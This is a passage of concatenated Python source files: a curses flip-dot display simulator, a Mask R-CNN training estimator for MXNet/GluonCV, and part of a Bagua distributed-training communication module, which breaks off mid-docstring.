sim.py
#! /usr/bin/env python
#
# python flipdot display simulator
import curses
import threading
import time
from PIL import Image
from flipdot import display
from flipdot.handler import *
class DisplaySim(threading.Thread):
def __init__(self, w, h, stdscr, refresh_rate=0.06, panels=None, portrait=False, debug=False):
super(DisplaySim, self).__init__()
self.d = display.Display(w, h, panels)
self.l = threading.RLock()
self.frames = 0
self.stopper = threading.Event()
self.portrait = portrait
self.stdscr = stdscr
self.debug = debug
self.sim_refresh = refresh_rate
self.debug_pos = (w+3, 1) if self.portrait else (h+3, 1) # position of debug data in ncurses
def stop(self):
self.stopper.set()
self.join()
def run(self):
while not self.stopper.is_set():
self.frames += 1
with self.l:
self.draw()
time.sleep(self.sim_refresh)
def draw(self):
if self.portrait:
px = self.d.im.rotate(angle=-90, expand=True).load()
h, w = self.d.im.size
else:
px = self.d.im.load()
w, h = self.d.im.size
if px:
# length of - to print for horizontal frame
r = w*2+2
onoff = {1: "●", 0: "○"}
self.stdscr.addstr(0, 1, "-"*r, curses.color_pair(2))
self.stdscr.addstr(h+1, 1, "-"*r, curses.color_pair(2))
for y in range(h):
self.stdscr.addstr(y+1, 0, "|", curses.color_pair(2))
self.stdscr.addstr(y+1, r+1, "|", curses.color_pair(2))
for x in range(w):
v = self.d.px_to_bit(px[x, y])
self.stdscr.addstr(y+1, 2+x*2, onoff[v], curses.color_pair(1))
self.stdscr.refresh()
def reset(self, address=None):
with self.l:
self.d.reset(address)
def update(self, data):
address = data[2]
body = data[3:-1]
if self.debug:
debug = "ADR: {} body: {}".format(address, ' '.join('{:02X}'.format(x) for x in body))
with self.l:
self.stdscr.addstr(self.debug_pos[0]+address, self.debug_pos[1], debug, curses.color_pair(3))
# update the internal image from the given list of bytes
if address in self.d.panels.keys():
(xs, ys), (w, h) = self.d.panels[address]
n = Image.new("RGB", (w, h))
if h != 7:
print("H is not 7!!!")
for x in range(w):
# get the next byte
b = body[x]
for y in range(h): # note that h should always be 7
px = b & 0x01
b = b >> 1
if px:
n.putpixel((x, y), (255, 255, 255))
with self.l:
self.d.im.paste(n, box=(xs, ys))
def start_server(args, sim):
if args.protocol != 'usb':
if args.protocol == 'tcp':
server = ThreadedTCPServer(("localhost", args.port), TCPHandler(sim.update))
elif args.protocol == 'udp':
server = ThreadedUDPServer(("localhost", args.port), UDPHandler(sim.update))
else:
raise ValueError('Invalid protocol')
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
else:
server = SerialHandler(args.usb, sim.update)
server.open()
def init_curses(args):
stdscr = curses.initscr()
curses.start_color()
# dots
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
# frame
curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.curs_set(0)
curses.noecho()
# make sure term is right size
if not args.debug:
if args.portrait:
curses.resize_term(args.width*2+4, args.height*2+4)
else:
curses.resize_term(args.height*2+4, args.width*2+4)
return stdscr
def stop_curses():
curses.echo()
curses.endwin()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='Run a TUI Alfa-Zeta flip-dot display simulation')
parser.add_argument('-P','--protocol', type=str, choices=['tcp', 'udp', 'usb'],
default='udp',
help='communication protocol to use')
parser.add_argument('-r','--refresh', type=float, default=0.06,
help='panel refresh rate in seconds')
parser.add_argument('-p','--port', type=int, default=5000,
help='network port to use on localhost')
parser.add_argument('-u','--usb', type=str, default='/dev/ttyUSB0',
help='usb port of USB->RS485 device')
parser.add_argument('-x','--width', type=int, default=28,
help='display width, should be multiple of panel width 28')
parser.add_argument('-y','--height', type=int, default=14,
help='display height, should be multiple of panel height 7')
parser.add_argument('--portrait', action='store_true',
help='panels are in portrait orientation, so rotate the TUI display')
parser.add_argument('-d','--debug', action='store_true',
help='enable debugging output')
args = parser.parse_args()
try:
stdscr = init_curses(args)
sim = DisplaySim(args.width, args.height, stdscr, debug=args.debug, refresh_rate=args.refresh, panels=display.create_display((28, 7), (args.width, args.height)), portrait=args.portrait)
if args.debug:
stdscr.addstr(*sim.debug_pos,
"W: {} H: {} Portrait: {} Panels: {} Panel size: {} Port: {}".format(args.width, args.height, args.portrait,
len(sim.d.panels), sim.d.panels[1][1], args.port),
curses.color_pair(2))
stdscr.addstr(sim.debug_pos[0]+1, sim.debug_pos[1], "Waiting for first data packet...", curses.color_pair(3))
sim.start()
start_server(args, sim)
try:
while True:
time.sleep(0.01)
except KeyboardInterrupt:
print("KeyboardInterrupt: stopping sim")
sim.stop()
finally:
stop_curses()
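# --- Usage sketch (illustrative, not part of the original script) ---
# update() above reads byte 2 of each packet as the panel address and bytes
# 3..-2 as one byte per column (low 7 bits = one 7-dot column). Assuming the
# usual Alfa-Zeta framing of two leading header bytes and one trailing end
# byte (the exact 0x80/0x83/0x8F values are an assumption, not taken from
# this file), a single 28x7 panel at address 1 could be driven over UDP:
#
#   import socket
#   columns = bytes([0b1010101] * 28)            # alternate dots down each column
#   packet = bytes([0x80, 0x83, 0x01]) + columns + bytes([0x8F])
#   sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   sock.sendto(packet, ("localhost", 5000))     # default --port is 5000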
mask_rcnn.py
"""Mask RCNN Estimator."""
# pylint: disable=consider-using-enumerate,abstract-method
import os
import math
import time
import logging
from multiprocessing import Process
import numpy as np
import mxnet as mx
from mxnet import gluon
from mxnet.contrib import amp
from .... import data as gdata
from .... import utils as gutils
from ....data import COCODetection, VOCDetection
from ....data.transforms import presets
from ....data.transforms.presets.rcnn import MaskRCNNDefaultTrainTransform, MaskRCNNDefaultValTransform
from ....model_zoo import get_model
from ....model_zoo.rcnn.mask_rcnn.data_parallel import ForwardBackwardTask
from ....nn.bbox import BBoxClipToImage
from ....utils.parallel import Parallel
from ....utils.metrics.rcnn import RPNAccMetric, RPNL1LossMetric, RCNNAccMetric, RCNNL1LossMetric, \
MaskAccMetric, MaskFGAccMetric
from ..base_estimator import BaseEstimator, set_default
from .utils import _get_dataset, _get_dataloader, _save_params, _split_and_load, _get_lr_at_iter
try:
import horovod.mxnet as hvd
except ImportError:
hvd = None
try:
from mpi4py import MPI
except ImportError:
logging.info('mpi4py is not installed. Use "pip install --no-cache mpi4py" to install')
MPI = None
from .default import MaskRCNNCfg
__all__ = ['MaskRCNNEstimator']
@set_default(MaskRCNNCfg())
class MaskRCNNEstimator(BaseEstimator):
"""Estimator implementation for Mask-RCNN.
Parameters
----------
config : dict
Config in nested dict.
logger : logging.Logger, default is None
Optional logger for this estimator, can be `None` when default setting is used.
reporter : callable, default is None
If set, use reporter callback to report the metrics of the current estimator.
Attributes
----------
_logger : logging.Logger
The customized/default logger for this estimator.
_logdir : str
The temporary dir for logs.
_cfg : autocfg.dataclass
The configurations.
"""
def __init__(self, config, logger=None, reporter=None):
super(MaskRCNNEstimator, self).__init__(config, logger, reporter)
# fix seed for mxnet, numpy and python builtin random generator.
gutils.random.seed(self._cfg.train.seed)
if self._cfg.mask_rcnn.amp:
amp.init()
# training contexts
if self._cfg.horovod:
self.ctx = [mx.gpu(hvd.local_rank())]
else:
ctx = [mx.gpu(int(i)) for i in self._cfg.gpus]
self.ctx = ctx if ctx else [mx.cpu()]
# network
kwargs = {}
module_list = []
if self._cfg.mask_rcnn.use_fpn:
module_list.append('fpn')
if self._cfg.mask_rcnn.norm_layer is not None:
module_list.append(self._cfg.mask_rcnn.norm_layer)
if self._cfg.mask_rcnn.norm_layer == 'bn':
kwargs['num_devices'] = len(self.ctx)
self.num_gpus = hvd.size() if self._cfg.horovod else len(self.ctx)
net_name = '_'.join(('mask_rcnn', *module_list, self._cfg.mask_rcnn.backbone, self._cfg.dataset))
if self._cfg.mask_rcnn.custom_model:
self._cfg.mask_rcnn.use_fpn = True
net_name = '_'.join(('mask_rcnn_fpn', self._cfg.mask_rcnn.backbone, self._cfg.dataset))
if self._cfg.mask_rcnn.norm_layer == 'bn':
norm_layer = gluon.contrib.nn.SyncBatchNorm
norm_kwargs = {'num_devices': len(self.ctx)}
# sym_norm_layer = mx.sym.contrib.SyncBatchNorm
sym_norm_kwargs = {'ndev': len(self.ctx)}
elif self._cfg.mask_rcnn.norm_layer == 'gn':
norm_layer = gluon.nn.GroupNorm
norm_kwargs = {'groups': 8}
# sym_norm_layer = mx.sym.GroupNorm
sym_norm_kwargs = {'groups': 8}
else:
norm_layer = gluon.nn.BatchNorm
norm_kwargs = None
# sym_norm_layer = None
sym_norm_kwargs = None
if self._cfg.dataset == 'coco':
classes = COCODetection.CLASSES
else:
# default to VOC
classes = VOCDetection.CLASSES
self.net = get_model('custom_mask_rcnn_fpn', classes=classes, transfer=None,
dataset=self._cfg.dataset, pretrained_base=self._cfg.train.pretrained_base,
base_network_name=self._cfg.mask_rcnn.backbone, norm_layer=norm_layer,
norm_kwargs=norm_kwargs, sym_norm_kwargs=sym_norm_kwargs,
num_fpn_filters=self._cfg.mask_rcnn.num_fpn_filters,
num_box_head_conv=self._cfg.mask_rcnn.num_box_head_conv,
num_box_head_conv_filters=self._cfg.mask_rcnn.num_box_head_conv_filters,
num_box_head_dense_filters=self._cfg.mask_rcnn.num_box_head_dense_filters,
short=self._cfg.mask_rcnn.image_short, max_size=self._cfg.mask_rcnn.image_max_size,
min_stage=2, max_stage=6, nms_thresh=self._cfg.mask_rcnn.nms_thresh,
nms_topk=self._cfg.mask_rcnn.nms_topk, post_nms=self._cfg.mask_rcnn.post_nms,
roi_mode=self._cfg.mask_rcnn.roi_mode, roi_size=self._cfg.mask_rcnn.roi_size,
strides=self._cfg.mask_rcnn.strides, clip=self._cfg.mask_rcnn.clip,
rpn_channel=self._cfg.mask_rcnn.rpn_channel,
base_size=self._cfg.mask_rcnn.anchor_base_size,
scales=self._cfg.mask_rcnn.anchor_scales,
ratios=self._cfg.mask_rcnn.anchor_aspect_ratio,
alloc_size=self._cfg.mask_rcnn.anchor_alloc_size,
rpn_nms_thresh=self._cfg.mask_rcnn.rpn_nms_thresh,
rpn_train_pre_nms=self._cfg.train.rpn_train_pre_nms,
rpn_train_post_nms=self._cfg.train.rpn_train_post_nms,
rpn_test_pre_nms=self._cfg.valid.rpn_test_pre_nms,
rpn_test_post_nms=self._cfg.valid.rpn_test_post_nms,
rpn_min_size=self._cfg.train.rpn_min_size,
per_device_batch_size=self._cfg.train.batch_size // self.num_gpus,
num_sample=self._cfg.train.rcnn_num_samples,
pos_iou_thresh=self._cfg.train.rcnn_pos_iou_thresh,
pos_ratio=self._cfg.train.rcnn_pos_ratio,
max_num_gt=self._cfg.mask_rcnn.max_num_gt,
target_roi_scale=self._cfg.mask_rcnn.target_roi_scale,
num_fcn_convs=self._cfg.mask_rcnn.num_mask_head_convs)
else:
self.net = get_model(net_name, pretrained_base=True,
per_device_batch_size=self._cfg.train.batch_size // self.num_gpus, **kwargs)
self._cfg.save_prefix += net_name
if self._cfg.resume.strip():
self.net.load_parameters(self._cfg.resume.strip())
else:
for param in self.net.collect_params().values():
if param._data is not None:
continue
param.initialize()
self.net.collect_params().reset_ctx(self.ctx)
if self._cfg.mask_rcnn.amp:
# Cast both weights and gradients to 'float16'
self.net.cast('float16')
# These layers don't support dtype 'float16'
self.net.collect_params('.*batchnorm.*').setattr('dtype', 'float32')
self.net.collect_params('.*normalizedperclassboxcenterencoder.*').setattr('dtype', 'float32')
# set up logger
logging.basicConfig()
self._logger = logging.getLogger()
self._logger.setLevel(logging.INFO)
log_file_path = self._cfg.save_prefix + '_train.log'
log_dir = os.path.dirname(log_file_path)
if log_dir and not os.path.exists(log_dir):
os.makedirs(log_dir)
fh = logging.FileHandler(log_file_path)
self._logger.addHandler(fh)
if MPI is None and self._cfg.horovod:
self._logger.warning('mpi4py is not installed, validation result may be incorrect.')
self._logger.info(self._cfg)
self.rpn_cls_loss = mx.gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False)
self.rpn_box_loss = mx.gluon.loss.HuberLoss(rho=self._cfg.train.rpn_smoothl1_rho) # == smoothl1
self.rcnn_cls_loss = mx.gluon.loss.SoftmaxCrossEntropyLoss()
self.rcnn_box_loss = mx.gluon.loss.HuberLoss(rho=self._cfg.train.rcnn_smoothl1_rho) # == smoothl1
self.rcnn_mask_loss = mx.gluon.loss.SigmoidBinaryCrossEntropyLoss(from_sigmoid=False)
self.metrics = [mx.metric.Loss('RPN_Conf'),
mx.metric.Loss('RPN_SmoothL1'),
mx.metric.Loss('RCNN_CrossEntropy'),
mx.metric.Loss('RCNN_SmoothL1'),
mx.metric.Loss('RCNN_Mask')]
self.rpn_acc_metric = RPNAccMetric()
self.rpn_bbox_metric = RPNL1LossMetric()
self.rcnn_acc_metric = RCNNAccMetric()
self.rcnn_bbox_metric = RCNNL1LossMetric()
self.rcnn_mask_metric = MaskAccMetric()
self.rcnn_fgmask_metric = MaskFGAccMetric()
self.metrics2 = [self.rpn_acc_metric, self.rpn_bbox_metric,
self.rcnn_acc_metric, self.rcnn_bbox_metric,
self.rcnn_mask_metric, self.rcnn_fgmask_metric]
self.async_eval_processes = []
self.best_map = [0]
self.epoch = 0
# training data
self.train_dataset, self.val_dataset, self.eval_metric = _get_dataset(self._cfg.dataset, self._cfg)
self.batch_size = self._cfg.train.batch_size // self.num_gpus \
if self._cfg.horovod else self._cfg.train.batch_size
self._train_data, self._val_data = _get_dataloader(
self.net, self.train_dataset, self.val_dataset, MaskRCNNDefaultTrainTransform, MaskRCNNDefaultValTransform,
self.batch_size, len(self.ctx), self._cfg)
def _validate(self, val_data, async_eval_processes, ctx, eval_metric, logger, epoch, best_map):
"""Test on validation dataset."""
clipper = BBoxClipToImage()
eval_metric.reset()
if not self._cfg.disable_hybridization:
self.net.hybridize(static_alloc=self._cfg.mask_rcnn.static_alloc)
tic = time.time()
for _, batch in enumerate(val_data):
batch = _split_and_load(batch, ctx_list=ctx)
det_bboxes = []
det_ids = []
det_scores = []
det_masks = []
det_infos = []
for x, im_info in zip(*batch):
# get prediction results
ids, scores, bboxes, masks = self.net(x)
det_bboxes.append(clipper(bboxes, x))
det_ids.append(ids)
det_scores.append(scores)
det_masks.append(masks)
det_infos.append(im_info)
# update metric
for det_bbox, det_id, det_score, det_mask, det_info in zip(det_bboxes, det_ids, det_scores,
det_masks, det_infos):
for i in range(det_info.shape[0]):
# numpy everything
det_bbox = det_bbox[i].asnumpy()
det_id = det_id[i].asnumpy()
det_score = det_score[i].asnumpy()
det_mask = det_mask[i].asnumpy()
det_info = det_info[i].asnumpy()
# filter by conf threshold
im_height, im_width, im_scale = det_info
valid = np.where(((det_id >= 0) & (det_score >= 0.001)))[0]
det_id = det_id[valid]
det_score = det_score[valid]
det_bbox = det_bbox[valid] / im_scale
det_mask = det_mask[valid]
# fill full mask
im_height, im_width = int(round(im_height / im_scale)), int(
round(im_width / im_scale))
full_masks = gdata.transforms.mask.fill(det_mask, det_bbox, (im_width, im_height))
eval_metric.update(det_bbox, det_id, det_score, full_masks)
if self._cfg.horovod and MPI is not None:
comm = MPI.COMM_WORLD
res = comm.gather(eval_metric.get_result_buffer(), root=0)
if hvd.rank() == 0:
logger.info('[Epoch {}] Validation Inference cost: {:.3f}'
.format(epoch, (time.time() - tic)))
rank0_res = eval_metric.get_result_buffer()
if len(rank0_res) == 2:
res = res[1:]
rank0_res[0].extend([item for res_tuple in res for item in res_tuple[0]])
rank0_res[1].extend([item for res_tuple in res for item in res_tuple[1]])
else:
rank0_res.extend([item for r in res for item in r])
def coco_eval_save_task(eval_metric, logger):
map_name, mean_ap = eval_metric.get()
if map_name and mean_ap is not None:
val_msg = '\n'.join(['{}={}'.format(k, v) for k, v in zip(map_name, mean_ap)])
logger.info('[Epoch {}] Validation: \n{}'.format(epoch, val_msg))
current_map = float(mean_ap[-1])
_save_params(self.net, logger, best_map, current_map, epoch, self._cfg.save_interval,
os.path.join(self._logdir, self._cfg.save_prefix))
if not self._cfg.horovod or hvd.rank() == 0:
p = Process(target=coco_eval_save_task, args=(eval_metric, self._logger))
async_eval_processes.append(p)
p.start()
def _fit(self, train_data, val_data, time_limit=math.inf):
"""
Fit Mask R-CNN models.
"""
# TODO(zhreshold): remove 'dataset' in config, use train_data/val_data instead
self._cfg.kv_store = 'device' \
if (self._cfg.mask_rcnn.amp and 'nccl' in self._cfg.kv_store) else self._cfg.kv_store
kv = mx.kvstore.create(self._cfg.kv_store)
self.net.collect_params().setattr('grad_req', 'null')
self.net.collect_train_params().setattr('grad_req', 'write')
for k, v in self.net.collect_params('.*bias').items():
v.wd_mult = 0.0
optimizer_params = {'learning_rate': self._cfg.train.lr, 'wd': self._cfg.train.wd,
'momentum': self._cfg.train.momentum, }
if self._cfg.train.clip_gradient > 0.0:
optimizer_params['clip_gradient'] = self._cfg.train.clip_gradient
if self._cfg.mask_rcnn.amp:
optimizer_params['multi_precision'] = True
if self._cfg.horovod:
hvd.broadcast_parameters(self.net.collect_params(), root_rank=0)
trainer = hvd.DistributedTrainer(
self.net.collect_train_params(), # fix batchnorm, fix first stage, etc...
'sgd',
optimizer_params
)
else:
trainer = gluon.Trainer(
self.net.collect_train_params(), # fix batchnorm, fix first stage, etc...
'sgd',
optimizer_params,
update_on_kvstore=(False if self._cfg.mask_rcnn.amp else None),
kvstore=kv)
if self._cfg.mask_rcnn.amp:
amp.init_trainer(trainer)
# lr decay policy
lr_decay = float(self._cfg.train.lr_decay)
lr_steps = sorted([float(ls) for ls in self._cfg.train.lr_decay_epoch])
lr_warmup = float(self._cfg.train.lr_warmup) # avoid int division
if self._cfg.train.verbose:
self._logger.info('Trainable parameters:')
self._logger.info(self.net.collect_train_params().keys())
self._logger.info('Start training from [Epoch %d]', self._cfg.train.start_epoch)
base_lr = trainer.learning_rate
for epoch in range(self._cfg.train.start_epoch, self._cfg.train.epochs):
self.epoch = epoch
rcnn_task = ForwardBackwardTask(self.net, trainer, self.rpn_cls_loss, self.rpn_box_loss, self.rcnn_cls_loss,
self.rcnn_box_loss, self.rcnn_mask_loss,
amp_enabled=self._cfg.mask_rcnn.amp)
executor = Parallel(self._cfg.train.executor_threads, rcnn_task) if not self._cfg.horovod else None
if not self._cfg.disable_hybridization:
self.net.hybridize(static_alloc=self._cfg.mask_rcnn.static_alloc)
while lr_steps and epoch >= lr_steps[0]:
new_lr = trainer.learning_rate * lr_decay
lr_steps.pop(0)
trainer.set_learning_rate(new_lr)
self._logger.info("[Epoch %d] Set learning rate to %f", epoch, new_lr)
for metric in self.metrics:
metric.reset()
tic = time.time()
btic = time.time()
train_data_iter = iter(self._train_data)
next_data_batch = next(train_data_iter)
next_data_batch = _split_and_load(next_data_batch, ctx_list=self.ctx)
for i in range(len(self._train_data)):
batch = next_data_batch
if i + epoch * len(self._train_data) <= lr_warmup:
# adjust based on real percentage
new_lr = base_lr * _get_lr_at_iter((i + epoch * len(self._train_data)) / lr_warmup,
self._cfg.train.lr_warmup_factor)
if new_lr != trainer.learning_rate:
if i % self._cfg.train.log_interval == 0:
self._logger.info('[Epoch %d Iteration %d] Set learning rate to %f', epoch, i, new_lr)
trainer.set_learning_rate(new_lr)
metric_losses = [[] for _ in self.metrics]
add_losses = [[] for _ in self.metrics2]
if executor is not None:
for data in zip(*batch):
executor.put(data)
for _ in range(len(self.ctx)):
if executor is not None:
result = executor.get()
else:
result = rcnn_task.forward_backward(list(zip(*batch))[0])
if (not self._cfg.horovod) or hvd.rank() == 0:
for k in range(len(metric_losses)):
metric_losses[k].append(result[k])
for k in range(len(add_losses)):
add_losses[k].append(result[len(metric_losses) + k])
try:
# prefetch next batch
next_data_batch = next(train_data_iter)
next_data_batch = _split_and_load(next_data_batch, ctx_list=self.ctx)
except StopIteration:
pass
for metric, record in zip(self.metrics, metric_losses):
metric.update(0, record)
for metric, records in zip(self.metrics2, add_losses):
for pred in records:
metric.update(pred[0], pred[1])
trainer.step(self.batch_size)
if (not self._cfg.horovod or hvd.rank() == 0) and self._cfg.train.log_interval \
and not (i + 1) % self._cfg.train.log_interval:
msg = ','.join(['{}={:.3f}'.format(*metric.get()) for metric in self.metrics + self.metrics2])
self._logger.info('[Epoch {}][Batch {}], Speed: {:.3f} samples/sec, {}'.format(
epoch, i,
self._cfg.train.log_interval * self._cfg.train.batch_size / (time.time() - btic), msg))
btic = time.time()
# validate and save params
if (not self._cfg.horovod) or hvd.rank() == 0:
msg = ','.join(['{}={:.3f}'.format(*metric.get()) for metric in self.metrics])
self._logger.info('[Epoch {}] Training cost: {:.3f}, {}'.format(
epoch, (time.time() - tic), msg))
if not (epoch + 1) % self._cfg.valid.val_interval:
# consider reducing the frequency of validation to save time
self._validate(self._val_data, self.async_eval_processes, self.ctx, self.eval_metric,
self._logger, epoch, self.best_map)
elif (not self._cfg.horovod) or hvd.rank() == 0:
current_map = 0.
_save_params(self.net, self._logger, self.best_map, current_map, epoch, self._cfg.save_interval,
os.path.join(self._logdir, self._cfg.save_prefix))
if self._reporter:
self._reporter(epoch=epoch, map_reward=current_map)
for thread in self.async_eval_processes:
thread.join()
def _evaluate(self, val_data):
"""Evaluate the current model on dataset.
"""
# TODO(zhreshold): remove self._val_data, use passed in val_data at runtime
return self._validate(self._val_data, self.async_eval_processes, self.ctx, self.eval_metric,
self._logger, self.epoch, self.best_map)
def predict(self, x):
"""Predict an individual example.
Parameters
----------
x : mxnet.nd.NDArray
The input image loaded as an MXNet NDArray.
"""
x, _ = presets.rcnn.transform_test(x, short=self.net.short, max_size=self.net.max_size)
x = x.as_in_context(self.ctx[0])
ids, scores, bboxes, masks = [xx[0].asnumpy() for xx in self.net(x)]
return ids, scores, bboxes, masks
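# --- Usage sketch (illustrative, not part of the original file) ---
# Assuming `cfg` is a populated nested config matching MaskRCNNCfg, single
# image inference could look roughly like this:
#
#   import mxnet as mx
#   est = MaskRCNNEstimator(cfg)
#   img = mx.image.imread('demo.jpg')                  # HWC uint8 NDArray
#   ids, scores, bboxes, masks = est.predict(img)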
communication.py
import logging
import multiprocessing
import bagua_core as B
from bagua.service import AutotuneService
from collections import defaultdict
from . import env
from .env import (
get_master_addr,
get_world_size,
get_rank,
get_local_rank,
get_local_size,
get_default_bucket_size,
get_bagua_service_port,
)
from .utils import flatten, unflatten, to_bagua_reduce_op
import torch
import torch.distributed as dist
import torch.distributed.distributed_c10d as c10d
from bagua.service.autotune_service import AutotuneClient
from functools import lru_cache
@lru_cache(maxsize=None)
def get_hyperparameters_service_client():
hyperparameters_service_client = AutotuneClient(
get_master_addr(), get_bagua_service_port()
)
return hyperparameters_service_client
@lru_cache(maxsize=None)
def get_backend(model_name: str):
backend = B.BaguaCommBackendPy(100, device_id=get_local_rank())
backend.device_id = get_local_rank()
backend.stream = torch.cuda.Stream(priority=-1)
backend.store = c10d._get_default_store()
backend.internode_communicator = init_bagua_inter_communicator(
model_name=model_name,
stream=backend.stream,
leader_rank=0,
store=backend.store,
device_id=backend.device_id,
)
backend.intranode_communicator = init_bagua_intra_communicator(
model_name=model_name,
stream=backend.stream,
store=backend.store,
device_id=backend.device_id,
)
backend.global_communicator = init_bagua_communicator(
model_name=model_name,
stream=backend.stream,
store=backend.store,
device_id=backend.device_id,
)
return backend
def run_flask_app():
from flask import Flask
autotune_service = AutotuneService(
world_size=get_world_size(),
autotune_level=env.get_autotune_level(),
max_samples=env.get_autotune_max_samples(),
sampling_confidence_time_s=env.get_autotune_sampling_confidence_time_s(),
warmup_time_s=env.get_autotune_warmup_time_s(),
is_output_autotune_log=env.get_is_output_autotune_log(),
default_bucket_size=get_default_bucket_size(),
)
app = Flask(__name__)
app = autotune_service.setup_app(app)
log = logging.getLogger("werkzeug")
log.setLevel(logging.ERROR)
app.run(
host="0.0.0.0",
port=get_bagua_service_port(),
debug=False,
)
_autotune_server = None
def start_autotune_server():
"""Start autotune server in background."""
global _autotune_server
_autotune_server = multiprocessing.Process(target=run_flask_app)
_autotune_server.daemon = True
_autotune_server.start()
def init_process_group():
"""Initializes the PyTorch builtin distributed process group, and this will
also initialize the distributed package, should be executed before all the
APIs of bagua.
Raises:
RepeatedInitializationError: If you run this function repeatedly
Examples::
>>> import bagua.torch_api as bagua
>>> bagua.init_process_group()
>>> model = torch.nn.Sequential(
... torch.nn.Linear(D_in, H),
... torch.nn.ReLU(),
... torch.nn.Linear(H, D_out),
... )
>>> optimizer = torch.optim.SGD(
... model.parameters(),
... lr=0.01,
... momentum=0.9
... )
>>> model, optimizer = bagua_init(model, optimizer)
"""
if not dist.is_initialized():
torch.distributed.init_process_group(
backend="nccl", init_method="env://"
) # fmt: off
if get_rank() == 0 and _autotune_server is None:
start_autotune_server()
def gen_nccl_unique_id(comm_type: str, root=0, store=None):
key = f"{comm_type}-{root}-unique_id"
if store is None:
store = c10d._get_default_store()
if get_rank() == root:
idstr = B.BaguaSingleCommunicatorPy.generate_nccl_unique_id_str()
store.set(key, idstr)
else:
idstr = store.get(key)
idstr = str(idstr, encoding="utf-8")
return idstr
def init_bagua_inter_communicator(
model_name: str, stream, leader_rank=0, store=None, device_id=None
):
if device_id is None:
device_id = get_local_rank()
nccl_unique_id = gen_nccl_unique_id(
f"bagua_inter_comm_{model_name}", root=leader_rank, store=store
)
if get_rank() % get_local_size() != leader_rank:
return None
comm = B.BaguaSingleCommunicatorPy(
rank=get_rank() // get_local_size(),
nranks=get_world_size() // get_local_size(),
device_id=device_id,
stream_ptr=stream.cuda_stream,
nccl_unique_id_str=nccl_unique_id,
)
comm.cuda_stream = stream
logging.debug(
"init bagua internode communicator ok, global rank: %s rank: %s",
dist.get_rank(),
comm.rank(),
)
return comm
def init_bagua_intra_communicator(model_name: str, stream, store=None, device_id=None):
if device_id is None:
device_id = get_local_rank()
nccl_unique_id = gen_nccl_unique_id(
f"bagua_intra_comm_{model_name}",
root=get_rank() // get_local_size() * get_local_size(),
store=store,
)
comm = B.BaguaSingleCommunicatorPy(
rank=get_rank() % get_local_size(),
nranks=get_local_size(),
device_id=device_id,
stream_ptr=stream.cuda_stream,
nccl_unique_id_str=nccl_unique_id,
)
comm.cuda_stream = stream
logging.debug(
"init bagua intranode communicator ok, global rank: %s rank: %s",
dist.get_rank(),
comm.rank(),
)
return comm
def init_bagua_communicator(model_name: str, stream, store=None, device_id=None):
if device_id is None:
device_id = get_local_rank()
nccl_unique_id = gen_nccl_unique_id(f"bagua_global_comm_{model_name}", store=store)
comm = B.BaguaSingleCommunicatorPy(
rank=get_rank(),
nranks=get_world_size(),
device_id=device_id,
stream_ptr=stream.cuda_stream,
nccl_unique_id_str=nccl_unique_id,
)
comm.cuda_stream = stream
logging.debug(
"init bagua global communicator ok, global rank: %s rank: %s",
dist.get_rank(),
comm.rank(),
)
return comm
def send(tensor, dst, comm: B.BaguaSingleCommunicatorPy = None):
r"""Sends a tensor to dst synchronously.
Args:
tensor (torch.Tensor): Data to be sent.
dst (int): Destination rank.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator
to work on. If None, the global bagua communicator will be used.
"""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.send(tensor.to_bagua_tensor().bagua_backend_tensor(), dst)
torch.cuda.synchronize()
def recv(tensor, src, comm: B.BaguaSingleCommunicatorPy = None):
r"""Receives a tensor synchronously.
Args:
tensor (torch.Tensor): Tensor to fill with received data.
src (int): Source rank.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator
to work on. If None, the global bagua communicator will be used.
"""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.recv(tensor.to_bagua_tensor().bagua_backend_tensor(), src)
torch.cuda.synchronize()
def broadcast_coalesced(tensors, src=0, comm: B.BaguaSingleCommunicatorPy = None):
for tensor in tensors:
assert tensor.device != torch.device(
"cpu"
), "input tensors must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
coalesced = flatten(tensors)
comm.broadcast(coalesced.to_bagua_tensor().bagua_backend_tensor(), src)
for buf, synced in zip(tensors, unflatten(coalesced, tensors)):
buf.copy_(synced)
# TODO: remove
torch.cuda.synchronize()
def broadcast(tensor, src=0, comm: B.BaguaSingleCommunicatorPy = None):
r"""Broadcasts the tensor to the whole communicator.
`tensor` must have the same number of elements in all processes
participating in the collective.
Args:
tensor (torch.Tensor): Data to be sent if `root` is the rank of
current process, and tensor to be used to save received data
otherwise.
src (int, optional): Source rank. Defaults to 0.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator
to work on. If None, the global bagua communicator will be used.
Defaults to None.
""" # noqa: W293
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.broadcast(tensor.to_bagua_tensor().bagua_backend_tensor(), src)
# TODO: remove
torch.cuda.synchronize()
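# Usage sketch (illustrative, not part of the original file): after
# init_process_group(), broadcast a CUDA tensor from rank 0 to all ranks.
#
#   t = torch.ones(4, device="cuda") if get_rank() == 0 else torch.zeros(4, device="cuda")
#   broadcast(t, src=0)      # every rank now holds a tensor of ones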
def reduce(
send_tensor,
recv_tensor,
dst,
op=dist.ReduceOp.SUM,
comm: B.BaguaSingleCommunicatorPy = None,
):
r"""Reduces the tensor across all processes.
Only the process with rank `dst` is going to receive the final result.
Args:
send_tensor (torch.Tensor): Input of the collective.
